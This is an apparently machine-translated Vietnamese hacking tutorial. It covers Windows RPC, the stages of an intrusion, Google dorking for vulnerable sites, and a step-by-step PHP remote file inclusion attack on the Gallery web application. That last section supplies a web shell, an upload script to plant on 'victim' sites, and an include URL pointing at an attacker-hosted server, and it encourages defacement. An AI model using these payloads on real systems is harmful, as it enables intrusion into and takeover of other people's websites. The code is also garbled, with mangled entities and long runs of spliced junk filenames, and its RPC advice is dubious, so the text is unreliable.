26. Learn about Remote Procedure Call (RPC)
Windows NT provides the ability to use RPC to execute distributed applications. Microsoft RPC includes libraries and services that allow distributed applications to run in a Windows NT environment. Major distributed applications include multiple execution processes with specific tasks. These processes can run on one or more computers.
Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must be associated with the Microsoft RPC name service interface (NIS). NIS includes API functions that allow access to multiple entities in the same name service database (the name service database contains entities, groups of entities, and history of entities on the server).
When installing Windows NT, Microsoft Locator is automatically selected as the name service provider. It is the best service provider in the Windows NT network environment.
27. Simple technique to prevent unauthorized access while online via RPC (Remote Procedure Call)
If you suspect your computer is hijacking or being tracked by a remote desktop administrator, just turn off the remote procedure call. There are currently no remote desktop programs available to track you. It also prevents most of the tools from accessing the machine (because most of the tools write connect based on remote procedure call (over tcp / ip). The majority of trojans also rely on this protocol.
Way off: Go to service / remote procedure call (right click) choose starup typt / disable or manual / apply.
This is a very effective way to protect your PC. If you add file sharing, it will be very difficult to hack.) But in LAN you are annoyed with it because you will not run programs related to it. this device. Depending on how you work you have a reasonable choice. In my opinion, if you use a LAN you should install a firewall is certainly relatively safe then that.
(According to the article "life as potatoes" admin - admin of HVA)
According to the list of Hacking Exposed 3 to hack a Web site usually we take the following steps:
- FootPrinting: Yes y is the way hackers do when they want to get the maximum amount of information about a server / business / user. It includes details about the IP address, Whois, DNS, etc. It is basically the official information related to the target. Many hackers simply use search engines on the Web to find information.
- Scanning: k Hi there, there is the evaluation and identification of the services that the target has. This includes port scans, operating system definitions, etc. The tools used here include nmap, WS pingPro, siphon, fscam and many more.
- Enumeration: The third step is to look for poorly-shielded resources, a user account that can be used to infiltrate. It includes default passwords, default scripts and services. Many network administrators do not know or modify these values.
- Gaining Access: b Now intruders will seek to access the network with the information obtained in the three steps above. The method used here may be to attack the buffer overflow, retrieve and decrypt the password file, or the most severe is brute force (check all cases) password. The tools commonly used in this step are NAT, podium, or L0pht.
- Escalating Privileges: v For example, in cases where a hacker enters the network with a guest account, he or she will seek complete control of the system. Hacker will try to crack the admin password, or use the vulnerability to escalate privileges. John and Riper are two great password crackers.
- Pilfering: (Used when files contain passwords loopholes), t Again, search engines are used to find methods for accessing the network. Text files containing passwords or other unsafe mechanisms can be a good hacker.
- Covering Tracks: Once the necessary information has been collected, the hacker attempts to erase the traces, delete the log files of the operating system, and make the manager not recognize the compromised system. We do not know who the intruder is.
- Creating "Back Doors": Do hackers leave "Back Doors", which is a mechanism that allows hackers to access back in a secret way? It takes a lot of work, either by installing a Trojan or creating a new user (for organizations with multiple users). The tools are Trojan, keylog and more.
- Denial of Service (DoS): If you do not succeed in penetrating, DoS is the ultimate means of attacking the system. If the system is not configured properly, it will be broken and allow the hacker to access. In other cases, DoS will cause the system to no longer function. The most commonly used tools for DoS attacks are trin00, Pong Of Death, teardrop, nukers, flooders. This method is very beneficial, and is still in widespread use today.
Depending on your knowledge and level that a hacker missed the step. It is not necessary to follow sequentially. Remember the "know who knows how many hundred hundred wins."
(HVA and hackervn.net documentation)
29. How to find the faulty website
Are you aware of specialized Web sites for finding information online? But you certainly do not expect that you can use those pages to find the Web site error (I still use google.com page and recommend you also use this site because it is very powerful and effective.
You are interested in web page errors and want to find them just go to google.com and type that error after "allinurl:". For example, we have the following Web page fault code:
cgi-bin / php.cgi? / etc / passwd
You would type: "allinurl: cgi-bin / php.cgi? / Etc / passwd"
It will list the web pages that are faulty for you, you look at the bottom of each listing (green address line) if any line write the same keyword you enter the page it has been or is failing. Whether or not you can access it depends on whether the Web site has fixed this bug or not.
If you are interested in forum errors, you want to find this forum to practice, just enter the keyword " powered by. The following is to find a forum using Snitz 2000: powered by Snitz 2000.
However, finding the right forum or Web page that is defective in this way is not likely to be high, so take a look at the special string in the URL that is specific to each type of site or forum (this is very important, Please find out more). For example, if you find a Hosting Controller error, you will see the following: / admin or / advadmin or / hosting " type keywords:
allinurl: / advadmin or allinurl: / admin or allinurl: / hosting
It will list web pages with URLs like: http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting.
VD with UBB forum features: cgi-bin / ultimatebb.cgi? "
We also look similar to the above. You just have to know how to find such and then just follow the update information page "Security Error" of HVA by LeonHart post you every day you will understand their meaning and test yourself.
30. Web hacking through Gallery faults (a type of php code inject error)
Gallery is a tool for creating a web gallery of images written in PHP, taking advantage of this loopholes can be used to add a PHP code that allows us to upload, that is our main purpose.
First of all you have to register a free host, it is best to register at brinkster.com for easy. Then open up notepad and create the PHP file with the following code:
CODE
& lt;? php
global $ PHP_SELF;
echo "
& lt; form method = post action = $ PHP_SELF? $ QUERY_STRING & gt;
& lt; input type = text name = shell size = 40 & gt;
& lt; input type = hidden name = value = shell & gt;
& lt; input type = submit value = Go name = sm & gt;
set_magic_quotes_runtime (1);
if ($ act == "shell") {
echo "nnnnnnnnnnnnnnnnnnnnnnnn & lt; xmp & gt;";
system ($ shell);
echo "nnnnnnnnnnnnnnnnnnnnnnnn ";}
echo " ";
1 & gt;
This code creates two files with different names (but the same code) and named as:
- shell: This file is used to run the shell on the victim host.
- init.php: This file is for uploading to the host you have just created. (You upload this init.php file soon because we will still use it but with another code, you forgot to upload this file onto the target).
CODE
& lt;? php
function handleupload () {
if (is_uploaded_file ($ _ FILES ['userfile'] ['tmp_name'])) {
$ filename = $ _FILES ['userfile'] ['tmp_name'];
print "$ filename was uploaded successfuly";
$ realname = $ _FILES ['userfile'] ['name'];
print "realname is $ realnamen";
print "copying file to uploads dir". $ realname;
copy ($ _FILES ['userfile'] ['tmp_name'], 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com PATH *. $ real me); // note 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com PATH 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com we will change later
} else {
echo "Possible file upload attack: filename". $ _ FILES ['userfile'] ['name']. ".";
if ($ act == "upload") {
handleupload ();
echo "
& lt; form ENCTYPE = multipart / form-data method = post action = $ PHP_SELF? $ QUERY_STRING & gt;
File: & lt; INPUT TYPE = FILE NAME = userfile SIZE = 35 & gt;
& lt; input type = hidden name = MAX_FILE_SIZE value = 1000000 & gt;
& lt; input type = hidden name = act value = upload & gt;
& lt; input type = submit value = Upload name = sm & gt;
1 & gt;
Name it upload.php, it will be used to upload to the victim's Web site.
Go to Google, type in "Powered by gallery" and then Enter, Google will list a bunch of sites using Gallery, pick up any page and then use the following link to try to see if it's a Gallery fault or not:
http: // victim's website & gt; /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/
If you see a rectangular box at the top, to the right of it is the transition box with the word "Go" as if you have found the object and then it. You can now type commands through the rectangle to hack the victim's Web.
Firstly, type "pwd" to specify the absolute path to the current directory and click the "Go" button, as it gives you a quick glance at the path at the bottom (I will use VD The path I found was "/ home / abc / xyz / gallery").
Then type "| s -a |" to list its subfolders. Now look at the results, you will see a bunch of subdirectories that we have listed. Always remember that our goal is to find a directory that can be used to upload the uploaded.php file that we have prepared before so you identify with me by looking at the last letter of each row. result:
- Please remove the case where the folder has "." Or ".." as this is the root directory or virtual directory (It is usually the topmost of the resulting rows).
- You also have to remove the last letter of the tail (eg config.php, check.inc.v.v ...) as these are files rather than folders.
- The rest are folders that can be uploaded, but I recommend that you select rows containing directory names that contain numbers greater than 1 (You can identify them by looking at the second column from the left), because that Make sure this is a directory not a virtual directory, and make the admin of the site difficult to detect when we install our file. I VD I discovered the folder "loveyou" contains 12 files can upload us, so the official path that we upload will be: / home / abc / xyz / Gallery / loveyou
Now go to your hosting account, edit the init.php file as the upload.php file, but edit 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com PATH 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com to "/ home / abc / xyz / gallery / loveyou /". Also prepare a file upload.php on your machine with 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com PATH 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-nghe?p=1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label:Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com www.securityfocus.com as "" (2 quotes).
Now that we can upload the file upload.php to the victim's Web site, please enter the following address on your web browser:
http: // victim's website & gt; /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/
You will see a rectangular frame next to and there are two buttons, one is the "brown" button, one is the "upload" button. The "brown" button is used to link to the upload.php file you have prepared on your computer, the "upload" button when you click on it, it will upload the file upload.php to the victim's Web site. Ok, now that you have completed the hacking Web. From now on, use the database, password (do the same as the hack tutorial before), but you should only practice, do not delete the database or destroy their Web. If you are a genuine hacker you just upload the web page text "Hack by ...... .." is enough.
Just as in the past, whether you have success or not also depends on the luck and persistence of research using your knowledge.
(Based on hacking tutorials of vnofear - viethacker.net)
GOODLUCK !!!!!!!!!!!!
(End of Part 4)
Anhdenday
HVAonline.net
